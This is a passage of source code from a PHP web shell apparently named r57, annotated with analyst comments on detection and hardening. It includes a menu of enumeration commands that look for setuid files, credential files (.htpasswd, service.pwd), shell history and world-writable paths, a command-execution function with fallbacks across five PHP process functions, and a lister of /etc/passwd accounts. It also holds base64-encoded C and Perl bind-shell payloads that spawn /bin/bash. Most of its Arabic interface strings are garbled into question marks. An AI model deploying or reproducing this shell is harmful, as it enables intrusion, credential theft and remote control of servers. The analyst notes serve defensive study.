2013 'ar_butt11'=>'????? ?????',
2014 'ar_text49'=>'??? ??????? ?? ???????',
2015 'ar_text50'=>'??? ??????? ??????? ????????',
2016 'ar_text51'=>'??? ??????? ???????',
2017 'ar_text52'=>'??? ??',
2018 'ar_text53'=>'?? ??????',
2019 'ar_text54'=>'??? ?? ?? ?? ???????',
2020 'ar_butt12'=>'???',
2021 'ar_text55'=>'??? ?? ???????',
2022 'ar_text56'=>'?????? :(',
2023 'ar_text57'=>'?????/??? ???/????',
2024 'ar_text58'=>'?????',
2025 'ar_text59'=>'???',
2026 'ar_text60'=>'????',
2027 'ar_butt13'=>'????? /???',
2028 'ar_text61'=>'?? ????? ?????',
2029 'ar_text62'=>'?? ????? ??????',
2030 'ar_text63'=>'?? ??? ?????',
2031 'ar_text64'=>'?? ??? ??????',
2032 'ar_butt65'=>'?????',
2033 'ar_text66'=>'???',
2034 'ar_text67'=>'???????/????????/????????',
2035 'ar_text68'=>'???',
2036 'ar_text69'=>'??? ?????',
2037 'ar_text70'=>'???????',
2038 'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2039 'ar_text72'=>'???? ??????',
2040 'ar_text73'=>'??? ?? ????????',
2041 'ar_text74'=>'??? ?? ???????',
2042 'ar_text75'=>'* you can use regexp',
2043 'ar_text76'=>'????? ?? ?? ?? ????? ?????? find',
2044 'ar_text80'=>'?????',
2045 'ar_text81'=>'?????????',
2046 'ar_text82'=>'????? ????????',
2047 'ar_text83'=>'????? ??? ???????',
2048 'ar_text84'=>'??????? ?????',
2049 'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2050 'ar_text86'=>'????? ????? ?? ???????',
2051 'ar_butt14'=>'?????',
2052 'ar_text87'=>'????? ????? ?? ???? ???? ?? ??',
2053 'ar_text88'=>'????? ???? ?? ??:??????',
2054 'ar_text89'=>'??? ?? ???? ?? ??',
2055 'ar_text90'=>'??????? ???',
2056 'ar_text91'=>'?????',
2057 'ar_text92'=>'?? ??? ???????',
2058 'ar_text93'=>'???? ?? ??',
2059 'ar_text94'=>'????? ???? ?? ??',
2060 'ar_text95'=>'????? ??????????',
2061 'ar_text96'=>'?? ????? ??? ????? ??????????',
2062 'ar_text97'=>'?? ?????: ',
2063 'ar_text98'=>'?? ?????: ',
2064 'ar_text99'=>'* ?????? ????? ?????????? ?? ??? /etc/passwd ????? ??? ftp',
2065 'ar_text100'=>'????? ??? ??? ???? ???? ?? ??',
2066 'ar_text101'=>'?????? ??????? ?????? ????????',
2067 'ar_text102'=>'????? ??????',
2068 'ar_text103'=>'????? ????',
2069 'ar_text104'=>'????? ??? ??? ???????',
2070 'ar_text105'=>'???',
2071 'ar_text106'=>'???',
2072 'ar_text107'=>'???????',
2073 'ar_butt15'=>'?????',
2074 'ar_text108'=>'???????',
2075 'ar_text109'=>'????',
2076 'ar_text110'=>'???',
2077 'ar_text111'=>'????? ????? ???????? : ??????',
2078 'ar_text112'=>'????? ??????? ?? ???? ???? ???? mb_send_mail',
2079 'ar_text113'=>'????? ????? ???????? ?? ???? via imap_list',
2080 'ar_text114'=>'????? ??????? ?? ???? ???? via imap_body',
2081 'ar_text115'=>'????? ??????? ?? ???? compress.zlib://',
2082 'ar_text116'=>'??? ??',
2083 'ar_text117'=>'???',
2084 'ar_text118'=>'?? ??? ?????',
2085 'ar_text119'=>'???????? ?????',
2086 'ar_err0'=>'???? ! ?????? ??????? ??? ??? ????? ',
2087 'ar_err1'=>'???? ! ??? ???? ??? ????? ??? ????? ',
2088 'ar_err2'=>'????! ?????? ??????? ',
2089 'ar_err3'=>'????! ??? ???? ??? ??????? ????? ?? ??',
2090 'ar_err4'=>'???? ! ???????? ?????? ??? ????? ???? ?? ??',
2091 'ar_err5'=>'???? ! ???????? ???? ?????? ?? ???? ?? ??',
2092 'ar_err6'=>'???? ! ???????? ????? ?????',
2093 'ar_err7'=>'?????? ????',
2094 'ar_text200'=>'copy()????? ??????? ?? ???? ????',
2095 'ar_text202'=>'???? ????? ?????? ??????',
2096 'ar_text300'=>'curl()????? ??????? ?? ???? ????',
2097 'ar_text203'=>'ini_restore()????? ??????? ?? ???? ????',
2098 'ar_text204'=>'error_log()????? ??????? ?? ???? ????',
2099 'ar_text205'=>'???? ???? ??? ??? ??????',
2100 'ar_text206'=>'????? ??????? ??????',
2101 'ar_text207'=>'????? ??????? ???????? ?? ???? ???? reg_glob',
2102 'ar_text208'=>'????? ??????? ?? ????? ????? ?? ???? ??????',
2103 'ar_text209'=>'????? ??????? ???????? ?? ???? ???? root',
2104 'ar_text210'=>'?? ????? ????? ',
2105 'ar_text211'=>'::????? ????? ???::',
2106 'ar_text212'=>'php.ini ????? ????? ??? ?? ???? ??? ???',
2107 'ar_text213'=>'htacces ????? ????? ??????? ?? ???? ??? ???',
2108 'ar_text214'=>'??? ??????',
2109 'ar_text215'=>'????? ??????? IRC ',
2110 'ar_text216'=>'# ??? ?????? ??',
2111 'ar_text217'=>'??? ??????? ???????',
2112 'ar_text218'=>'?????? ????? ??? ini_restore ??? ??? ????? ??? ????',
2113 'ar_text219'=>'??? ????? ??? ??????? ????? ????? ?????? ?????',
2114 'ar_text220'=>'??????? ??????? ?? ???? ???? symlink ?????? ??????',
2115 'ar_text221'=>'??? ??????? ???????? ?? ??????(??? ??????? ?????? ??? ?????? ????? ???????? ??????)1',
2116 'ar_text222'=>'??????? ??????? ?? ???? ???? symlink ?????? ???????',
2117 'ar_text223'=>'????? ??????? ?? ???? ??????',
2118 'ar_text224'=>'PLUGIN ????? ??????? ?? ???? ???? ',
2119 );
2120 /*
2121 ?????? ??????
2122 ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
2123 ?? ?????? ???? ????????? ??? ???????? ???????.
2124 */
// [analyst note] Canned command menu: label => shell command. The commands enumerate setuid/setgid
// files (-perm -04000 / -02000), world-writable files and directories (-perm -2), configuration and
// credential files (config*, service.pwd, .htpasswd), shell and client history files, listening
// sockets, mounts, the cPanel accounting log, processes, logged-in users and available
// download/compiler tools.
// Detection: process-creation telemetry showing the web server or PHP account spawning find with
// these -perm/-name arguments, or reading /etc/fstab and /var/cpanel/accounting.log, is a
// high-signal indicator of interactive use of a shell like this one.
// NOTE(review): as rendered on this page the first and third labels (and the second and fourth) are
// byte-identical, so the later -02000 entries replace the -04000 ones in the array; the original
// labels were probably distinct before the encoding was lost.
2125 $aliases=array(
2126 '????? ?? ????? suid'=>'find / -type f -perm -04000 -ls',
2127 '????? ?? ????? suid ?? ?????? ??????'=>'find . -type f -perm -04000 -ls',
2128 '????? ?? ????? suid'=>'find / -type f -perm -02000 -ls',
2129 '????? ?? ????? suid ?? ?????? ??????'=>'find . -type f -perm -02000 -ls',
2130 '????? ?? ????? config.inc.php'=>'find / -type f -name config.inc.php',
2131 '????? ?? ????? config.inc.php ?? ?????? ??????'=>'find . -type f -name config.inc.php',
2132 '????? ?? ????? config* ????? ??????????'=>'find / -type f -name "config*"',
2133 '????? ?? ????? config* ?? ?????? ??????'=>'find . -type f -name "config*"',
2134 '????? ?? ??????? ??????? ???????'=>'find / -type f -perm -2 -ls',
2135 '????? ?? ??????? ??????? ??????? ?? ?????? ??????'=>'find . -type f -perm -2 -ls',
2136 '????? ?? ???????? ??????? ???????'=>'find /  -type d -perm -2 -ls',
2137 '????? ?? ???????? ??????? ??????? ?? ?????? ??????'=>'find . -type d -perm -2 -ls',
2138 '????? ?? ????? ??????? ????? ???????'=>'find / -perm -2 -ls',
2139 '????? ?? ????? ??????? ?? ?????? ??????'=>'find . -perm -2 -ls',
2140 '????? ?? ????? service.pwd'=>'find / -type f -name service.pwd',
2141 '????? ?? ????? service.pwd ?? ?????? ??????'=>'find . -type f -name service.pwd',
2142 '????? ?? ?? ????? ??????? ??????? .htpasswd'=>'find / -type f -name .htpasswd',
2143 '????? ?? ???? ????? ??????? ??????? ?? ?????? ??????'=>'find . -type f -name .htpasswd',
2144 '????? ?? ???? ????? .bash_history'=>'find / -type f -name .bash_history',
2145 '????? ?? ???? ????? .bash_history ?? ?????? ??????'=>'find . -type f -name .bash_history',
2146 '????? ?? ???? ????? .mysql_history'=>'find / -type f -name .mysql_history',
2147 '????? ?? ???? ????? .mysql_history ?? ?????? ??????'=>'find . -type f -name .mysql_history',
2148 '????? ?? ???? ????? .fetchmailrc'=>'find / -type f -name .fetchmailrc',
2149 '????? ?? ???? ????? .fetchmailrc ?? ?????? ??????'=>'find . -type f -name .fetchmailrc',
2150 '??? ????? ????? ?? ??????'=>'lsattr -va',
2151 '???? ???????? ???????? ?? ???????'=>'netstat -an | grep -i listen',
2152 '???? ???? ???????? ???????? ???????'=>'cat /etc/fstab',
2153 '?????? ??? ????? ????? ???? ???? ???????? ??? ???????'=>'cat /var/cpanel/accounting.log',
2154 '?????? ???????? ???? ???? ???? ???????'=>'ps aux',
2155 '?????????? ???????? ?????'=>'w',
2156 '??? ???????? ?????'=>'lastlog',
2157 '??? ????? ????? wget curl ..etc'=>'which wget curl w3m lynx',
2158 '??? ???? ??????? gcc'=>'locate gcc',
2159 
2160 '----------------------------------------------------------------------------------------------------'=>'ls -la'
2161 );
// [analyst note] Reusable HTML fragments for the shell's page layout (table rows, brackets, font tag,
// form open/close). The fixed markup, e.g. the tahoma size=-2 font tag and the "::" section
// headers, is constant across responses and can serve as a response-body signature.
2162 $table_up1  = "<tr><td bgcolor=#272727><font face=tahoma size=-2><b><div align=center>:: ";
2163 $table_up2  = " ::</div></b></font></td></tr><tr><td>";
2164 $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#333333>";
2165 $table_end1 = "</td></tr>";
2166 $arrow = " <font face=Webdings color=gray>4</font>";
2167 $lb = "<font color=black>[</font>";
2168 $rb = "<font color=black>]</font>";
2169 $font = "<font face=tahoma size=-2>";
2170 $ts = "<table class=table1 width=100% align=center>";
2171 $te = "</table>";
     // Every form posts back to the script itself (no action attribute), so operator activity
     // appears in access logs as repeated POSTs to a single URL.
2172 $fs = "<form name=form method=POST>";
2173 $fe = "</form>";
// [analyst note] ?users view: prints one entry per line from get_users(), or the localized
// "can't get users list" message (_text96) when it returns nothing. get_users() is defined outside
// this excerpt; the related UI string (_text99) refers to usernames from /etc/passwd, so it
// presumably reads local account names - confirm against its definition. Entries are echoed
// without HTML escaping.
2174 if(isset($_GET['users']))
2175  {
2176  if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
2177  else
2178   {
2179   echo '<center>';
2180   foreach($users as $user) { echo $user."<br>"; }
2181   echo '</center>';
2182   }
2183  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
2184  }
// Working-directory and platform detection.
// The working directory is switched to whatever the client sends in POST `dir`
// (no validation; errors are suppressed), so every later relative path is
// resolved against a client-chosen location.
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
// $unix: 1 = treat host as Unix-like, 0 = treat host as Windows.
$unix = 0;
// A drive-letter style path (second character ':') is taken to mean Windows.
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
// Fallback when getcwd() gave nothing: decide from the OS environment variable
// or php_uname().
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
    {
    // NOTE(review): eregi() was removed in PHP 7, so this branch can only run on
    // older interpreters.
    if(@eregi("^win",$os)) { $unix = 0; }
    else { $unix = 1; }
    }
 }
// Request handler: server-side text search. Runs when POST carries `s_dir`,
// `s_text` and `cmd=search_text`; prints the matches as an HTML table and stops.
// Review notes for defenders:
//  - A POST body containing `cmd=search_text` together with `s_dir` / `s_text`
//    is a log indicator for this handler.
//  - Directory list, search text and file mask all come straight from the request.
//  - File names and matched lines are written into the page without HTML escaping
//    (SearchText() strips tags from matched lines but does not encode them).
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  {
    // $head is defined outside this part of the file.
    echo $head;
    // The extension mask is applied only when both `s_mask` and `m` are sent.
    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
    // (0,0): no word-boundary wrapping, case-insensitive matching.
    $sr->SearchText(0,0);
    $res = $sr->GetResultFiles();
    $found = $sr->GetMatchesCount();
    // $titles is fetched but not used in this handler.
    $titles = $sr->GetTitles();
    $r = "";
    if($found > 0)
    {
      $r .= "<TABLE width=100%>";
      // $res maps file path => (line number => highlighted line text).
      foreach($res as $file=>$v)
      {
        $r .= "<TR>";
        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
        // Show backslash separators when the host was detected as Windows.
        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
        $r .= "</b></font></ TD>";
        $r .= "</TR>";
        foreach($v as $a=>$b)
        {
          $r .= "<TR>";
          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
          $r .= "</TR>\n";
        }
      }
      $r .= "</TABLE>";
    echo $r;
    }
    else
    {
      // No matches: localized message stored under '<language>_text56'.
      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
    }
  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  die();
  }
// Capability probe: runs `echo abcr57` through ex() and expects "r57" at offset 3
// of the output. If the output does not look like that (command execution is not
// available), the script switches itself to its safe_mode behaviour.
// Review note for defenders: the literal command line `echo abcr57` spawned by the
// web server's PHP process is a distinctive indicator in process-audit logs.
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
// Web server banner from the environment, "-" when it is not set.
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
function ws($i)
{
 // HTML spacing helper: returns $i consecutive non-breaking-space entities.
 // Warnings from str_repeat() are suppressed, as in the rest of the file.
 $padding = @str_repeat("&nbsp;", $i);
 return $padding;
}
// Command-execution primitive of the script: passes $cfe to the operating system
// and returns whatever the command printed ('' when $cfe is empty or nothing ran).
// It tries exec, shell_exec, system, passthru and finally popen, using the first
// one that is available; all warnings are suppressed with '@'.
// Review notes for defenders:
//  - $cfe is executed as given; callers in this file build it from request data.
//  - Because of the fallback chain, disabling only some of these functions does
//    not stop it. Hardening means disabling every process-execution function the
//    application does not need (php.ini disable_functions) and alerting when the
//    PHP worker process spawns a shell.
//  - A chain of function_exists() checks over these five functions is a common
//    static signature for web shells.
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    // exec() fills $res with an array of output lines; join them back into text.
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    // system() prints directly, so the output is captured with output buffering.
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    // Same buffering approach as for system().
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   // Last resort: read the command's stdout from a pipe in 1024-byte chunks.
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}
// Returns the list of local account names read from /etc/passwd, or 0 when the
// file cannot be read (or is empty).
// Review note for defenders: reads of /etc/passwd by the web server user that are
// followed by the names appearing in an HTTP response indicate account enumeration.
function get_users()
{
  $users = array();
  $rows=file('/etc/passwd');
  if(!$rows) return 0;
  foreach ($rows as $string)
   {
           // Field 0 (text before the first ':') is the account name.
           $user = @explode(":",$string);
           // Lines starting with '#' are skipped as comments.
           if(substr($string,0,1)!='#') array_push($users,$user[0]);
   }
  return $users;
}
// Prints a red, centered error banner.
// $n selects the message stored under '<language>_err<n>' in the global $lang
// table; $txt, when not empty, is appended after a single space. Always returns null.
// NOTE(review): $txt is echoed as-is, without HTML escaping.
function err($n,$txt='')
{
 $messageKey = $GLOBALS['language'].'_err'.$n;
 $bannerOpen = '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
 $bannerClose = '</b></div></font></td></tr></table>';

 echo $bannerOpen;
 echo $GLOBALS['lang'][$messageKey];
 if (empty($txt) == false)
 {
  echo " $txt";
 }
 echo $bannerClose;
 return null;
}
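// Formats a numeric file mode (as returned by fileperms()) as an `ls -l` style
// string such as "-rw-r--r--" or "drwxr-xr-x".
//
// $mode   integer file mode: type bits plus permission bits.
// returns the 10-character string on Unix-like hosts; integer 0 when the global
//         $unix flag is false (unchanged historical behaviour).
//
// Fix: the file type used to be picked with a chain of single-bit tests
// ($mode & 0x2000, $mode & 0x4000, ...). Types whose code has several bits set
// (block device 0x6000, symlink 0xA000, socket 0xC000) matched an earlier branch
// and were reported as 'c' or 'd'. The type field is now masked with 0xF000 and
// compared for equality.
function perms($mode)
{
 if (!$GLOBALS['unix']) return 0;

 // The top four bits of the mode hold the file type.
 switch ($mode & 0xF000)
 {
  case 0x1000: $type = 'p'; break; // FIFO
  case 0x2000: $type = 'c'; break; // character device
  case 0x4000: $type = 'd'; break; // directory
  case 0x6000: $type = 'b'; break; // block device
  case 0x8000: $type = '-'; break; // regular file
  case 0xA000: $type = 'l'; break; // symbolic link
  case 0xC000: $type = 's'; break; // socket
  default:     $type = 'u';        // unknown
 }

 // Plain read/write/execute triplets for owner, group and world.
 $owner["read"]    = ($mode & 00400) ? 'r' : '-';
 $owner["write"]   = ($mode & 00200) ? 'w' : '-';
 $owner["execute"] = ($mode & 00100) ? 'x' : '-';
 $group["read"]    = ($mode & 00040) ? 'r' : '-';
 $group["write"]   = ($mode & 00020) ? 'w' : '-';
 $group["execute"] = ($mode & 00010) ? 'x' : '-';
 $world["read"]    = ($mode & 00004) ? 'r' : '-';
 $world["write"]   = ($mode & 00002) ? 'w' : '-';
 $world["execute"] = ($mode & 00001) ? 'x' : '-';

 // setuid / setgid / sticky replace the execute column: lower case when the
 // execute bit is also set, upper case when it is not.
 if ($mode & 0x800) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
 if ($mode & 0x400) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
 if ($mode & 0x200) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';

 $s  = $type;
 $s .= $owner['read'].$owner['write'].$owner['execute'];
 $s .= $group['read'].$group['write'].$group['execute'];
 $s .= $world['read'].$world['write'].$world['execute'];
 return trim($s);
}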
// Builds the markup for one <input> element.
// $type / $name are written unquoted, $size is emitted only when it is not 0,
// $value is wrapped in double quotes, and " checked" is appended when $checked
// is truthy.
// NOTE(review): none of the arguments is HTML-escaped here; callers are
// responsible for what they pass in.
function in($type,$name,$size,$value,$checked=0)
{
 $html = "<input type=".$type." name=".$name." ";
 if (!($size == 0))
 {
  $html .= "size=".$size." ";
 }
 $html .= "value=\"".$value."\"";
 $html .= $checked ? " checked" : "";
 return $html.">";
}
// Resolves a program name to a path by running `which <name>` through ex().
// Returns the command output when there is any, otherwise the name unchanged.
// NOTE(review): $pr is placed into the command line without quoting or escaping.
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
// Writes a file: base64-decodes $text and stores the result at $fname
// (opened with mode "w", so an existing file is truncated). On open failure
// err(0) prints the error banner and nothing is written.
// Review note for defenders: this is how the base64 blobs defined in this file
// would reach disk; new files created by the web server user in writable
// locations shortly after a request to this script are worth collecting.
function cf($fname,$text)
{
 // '=' binds tighter than 'or': $w_file receives the fopen() result and err(0)
 // runs only when that result is false.
 $w_file=@fopen($fname,"w") or err(0);
 if($w_file)
 {
 @fputs($w_file,@base64_decode($text));
 @fclose($w_file);
 }
}
// Renders one two-column table row: a right-aligned label cell whose width is
// $l percent, followed by a left-aligned content cell.
// $t1 and $t2 are inserted as-is (no HTML escaping).
function sr($l,$t1,$t2)
 {
 $labelCell = "<td class=td1 width=".$l."% align=right>".$t1."</td>";
 $valueCell = "<td class=td1 align=left>".$t2."</td>";
 return "<tr class=tr1>".$labelCell.$valueCell."</tr>";
 }
// Defined only when no function named view_size already exists.
if (!@function_exists("view_size"))
{
// Formats a byte count for display: values are divided by the largest binary
// unit that fits (GB, MB, KB), rounded to two decimals, and suffixed with the
// unit; anything below 1024 is shown in bytes.
function view_size($size)
{
 // Largest unit first so the first threshold reached wins.
 $units = array(" GB" => 1073741824, " MB" => 1048576, " KB" => 1024);
 foreach ($units as $suffix => $divisor)
 {
  if ($size >= $divisor)
  {
   $size = @round($size / $divisor * 100) / 100 . $suffix;
   return $size;
  }
 }
 $size = $size . " B";
 return $size;
}
}
2368   function DirFilesR($dir,$types='')
2369   {
2370     $files = Array();
2371     if(($handle = @opendir($dir)))
2372     {
2373       while (false !== ($file = @readdir($handle)))
2374       {
2375         if ($file != "." && $file != "..")
2376         {
2377           if(@is_dir($dir."/".$file))
2378             $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
2379           else
2380           {
2381             $pos = @strrpos($file,".");
2382             $ext = @substr($file,$pos,@strlen($file)-$pos);
2383             if($types)
2384             {
2385               if(@in_array($ext,explode(';',$types)))
2386                 $files[] = $dir."/".$file;
2387             }
2388             else
2389               $files[] = $dir."/".$file;
2390           }
2391         }
2392       }
2393       @closedir($handle);
2394     }
2395     return $files;
2396   }
  // Text search over files on the server: collects the files below one or more
  // directories, then scans each file line by line for the search words and keeps
  // the matching lines with HTML highlighting.
  // Review notes:
  //  - The constructor uses the PHP 4 convention (method named like the class).
  //    PHP 8 no longer treats such a method as a constructor.
  //  - The search text is placed into a regular expression without quoting, so
  //    regex metacharacters in it are interpreted as pattern syntax.
  class SearchResult
  {
    var $text;               // raw search text
    var $FilesToSearch;      // list of file paths to scan
    var $ResultFiles;        // file path => (line number => highlighted line)
    var $FilesTotal;         // number of files in $FilesToSearch
    var $MatchesCount;       // total number of matches over all files
    var $FileMatschesCount;  // NOTE(review): spelling differs from FileMatchesCount, the name the methods use
    var $TimeStart;          // timestamp taken in the constructor
    var $TimeTotal;          // seconds spent, set at the end of SearchText()
    var $titles;             // initialized to an empty array; not filled anywhere in this class
    // $dir    one or more directories separated by ';'
    // $text   words to look for, separated by single spaces
    // $filter optional ';'-separated extension list handed to DirFilesR()
    function SearchResult($dir,$text,$filter='')
    {
      $dirs = @explode(";",$dir);
      $this->FilesToSearch = Array();
      // Gather the files of every listed directory (recursively, via DirFilesR).
      for($a=0;$a<count($dirs);$a++)
        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
      $this->text = $text;
      $this->FilesTotal = @count($this->FilesToSearch);
      $this->TimeStart = getmicrotime();
      $this->MatchesCount = 0;
      $this->ResultFiles = Array();
      $this->FileMatchesCount = Array();
      $this->titles = Array();
    }
    // Plain accessors for the fields above.
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
    function GetResultFiles() { return $this->ResultFiles; }
    // Runs the search and fills ResultFiles, MatchesCount, FileMatchesCount and
    // TimeTotal.
    // $phrase truthy: each word is wrapped in \b word boundaries.
    // $case   falsy: the 'i' (case-insensitive) modifier is added.
    function SearchText($phrase=0,$case=0) {
    $qq = @explode(' ',$this->text);
    $delim = '|';
      if($phrase)
        foreach($qq as $k=>$v)
          $qq[$k] = '\b'.$v.'\b';
      // Pattern is an alternation of the words: /(w1|w2|...)/ -- words are not
      // passed through preg_quote().
      $words = '('.@implode($delim,$qq).')';
      $pattern = "/".$words."/";
      if(!$case)
        $pattern .= 'i';
      foreach($this->FilesToSearch as $k=>$filename)
      {
        $this->FileMatchesCount[$filename] = 0;
        // NOTE(review): `@next` is a bare identifier, not a loop-control statement,
        // so a file that cannot be read does not skip the rest of this iteration.
        $FileStrings = @file($filename) or @next;
        for($a=0;$a<@count($FileStrings);$a++)
        {
          $count = 0;
          $CurString = $FileStrings[$a];
          $CurString = @Trim($CurString);
          // Tags are stripped before matching; remaining text is not HTML-encoded.
          $CurString = @strip_tags($CurString);
          $aa = '';
          if(($count = @preg_match_all($pattern,$CurString,$aa)))
          {
            // Wrap every match in a highlighted span and store the line under its
            // 1-based line number.
            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
            $this->ResultFiles[$filename][$a+1] = $CurString;
            $this->MatchesCount += $count;
            $this->FileMatchesCount[$filename] += $count;
          }
        }
      }
      // Elapsed time since construction, rounded to 4 decimals.
      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
    }
  }
2461   function getmicrotime()
2462   {
2463     list($usec,$sec) = @explode(" ",@microtime());
2464     return ((float)$usec + (float)$sec);
2465   }
2466 $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
2467 A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
2468 GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
2469 b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
2470 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
2471 NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
2472 ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
2473 ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
2474 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
2475 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2476 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
2477 dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
2478 lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
2479 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
2480 VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
2481 JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
2482 TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
2483 lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
2484 Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
